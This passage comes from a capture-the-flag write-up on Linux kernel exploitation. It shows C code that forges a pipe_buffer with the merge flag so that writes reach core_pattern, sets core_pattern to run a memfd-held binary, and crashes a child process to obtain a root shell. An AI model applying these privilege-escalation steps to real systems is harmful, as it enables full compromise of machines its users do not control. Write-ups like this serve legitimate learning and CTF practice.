The difference between the addresses of the pages backing vdso_image_64.data and core_pattern is 0x438000. For every 0x1000-byte page there is a 64-byte struct page stored in vmemmap, so to get the difference between the struct page addresses you compute 0x438000 / 4096 * 64, which is 0x438000 >> 6 = 0x10e00.

Looking at the pre-overwritten pipe_buffer:

its len is already 1. By leaving len untouched and setting pipe_buffer->offset = 0xa60 - 1, we can overwrite the entire content of core_pattern! We also need to set the PIPE_BUF_FLAG_CAN_MERGE flag in pipe_buffer->flags so that every pipe write also writes to the underlying physical page.

Here's the code for this part:
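
A hedged sketch (offsets as before; PIPE_BUF_FLAG_CAN_MERGE is 0x10 in include/linux/pipe_fs_i.h, and the 0x438000 >> 6 delta is the one computed above):

```c
struct fake_pipe_buf {             /* mirrors struct pipe_buffer */
    uint64_t page;
    uint32_t offset, len;
    uint64_t ops;
    uint32_t flags, _pad;
    uint64_t private;
};

/* free the overlapping seg for real this time (no MSG_COPY) */
struct { long mtype; char mtext[0xfd0 + 0x3f8]; } m2 = { .mtype = 1 };
msgrcv(qids[victim_q], &m2, sizeof(m2.mtext), 0, IPC_NOWAIT);

/* rebuild the second ring slot as a fake pipe_buffer and respray */
memset(m2.mtext, 0, sizeof(m2.mtext));
struct fake_pipe_buf *fake = (void *)(m2.mtext + 0xfd0 + 0x20);
fake->page   = vdso_page + (0x438000 >> 6);  /* core_pattern's struct page */
fake->offset = 0xa60 - 1;     /* next merged write lands on core_pattern   */
fake->len    = 1;
fake->ops    = 0;             /* keep ops NULL                             */
fake->flags  = 0x10;          /* PIPE_BUF_FLAG_CAN_MERGE                   */
for (int i = 0; i < NSEG; i++) {
    int q = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    msgsnd(q, &m2, sizeof(m2.mtext), 0);
}
```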

Part 10. Setting up the command + executing it for root shell

We still need to decide what to write into core_pattern to get LPE when a crash is triggered. I used the same method as this exploit: overwrite it with |/proc/%P/fd/666 %P\n. Doing so causes the kernel to execute whatever program is behind the crashing process's fd 666, passing the PID as an argument.

Then consider the following main, whose behaviour is described below (a hedged sketch follows the description):

The child process:

  • Creates an in-memory file and copies the program's ELF image into it

  • Moves it to fd 666, so it is reachable at /proc/CHILD-PID/fd/666

  • Waits for the parent's signal that the exploit is finished by doing read(cfd[0], dummybuf, 1)

When the parent executes write(cfd[1], dummybuf, 1), it signals to the child that the exploit is done.

The child then triggers a crash by dereferencing NULL, causing the command we wrote into core_pattern to be executed. This runs the executable at /proc/CHILD-PID/fd/666 as root with the PID as an argument, giving us a root shell and the flag.
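
A hedged sketch of that scaffolding (error handling omitted; the core_pattern write at the end is the step-10 trigger from the previous part):

```c
/* needs _GNU_SOURCE; memfd_create() is declared in <sys/mman.h> */
int cfd[2];
pipe(cfd);

if (fork() == 0) {                      /* child */
    int mfd = memfd_create("x", 0);     /* in-memory file                */
    int self = open("/proc/self/exe", O_RDONLY);
    char buf[0x1000];
    ssize_t n;
    while ((n = read(self, buf, sizeof(buf))) > 0)
        write(mfd, buf, n);             /* copy our own ELF image in     */
    dup2(mfd, 666);                     /* now at /proc/CHILD-PID/fd/666 */
    char dummybuf;
    read(cfd[0], &dummybuf, 1);         /* wait for the parent's signal  */
    *(volatile int *)0 = 0;             /* crash -> core_pattern runs    */
}

/* ... the whole exploit runs here, ending with the core_pattern write: */
const char *pat = "|/proc/%P/fd/666 %P\n";
for (int i = 0; i < NBIG; i++)
    write(big_pipes[i][1], pat, strlen(pat));

char dummybuf = 'x';
write(cfd[1], &dummybuf, 1);            /* signal the child to crash     */
```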

Compiling and sending the exploit to remote

According to ptr-yudai's blog post, it usually works fine to compile your exploit with musl-gcc (which makes the binary much smaller) and send it to the remote as base64. However, for some reason my exploit stopped working once I compiled it with musl-gcc: the third LSB to overwrite in the partial-overwrite stage had changed. The exploit worked again once I adjusted that byte.

I also used the following uploader.py (generated by ChatGPT) to automate the PoW solving, the sending of the base64, and its decoding back into the binary on the remote:

Afterthoughts

Although I spent a really long time on this challenge, in hindsight it was a really good idea to persevere with it. I learnt a ton about the workings of the Linux kernel's allocators and numerous kernel exploitation techniques.

Final code

Note: There is some unused code in here, but if you followed the entire post you should be able to comprehend the code just fine! ๐Ÿ˜„
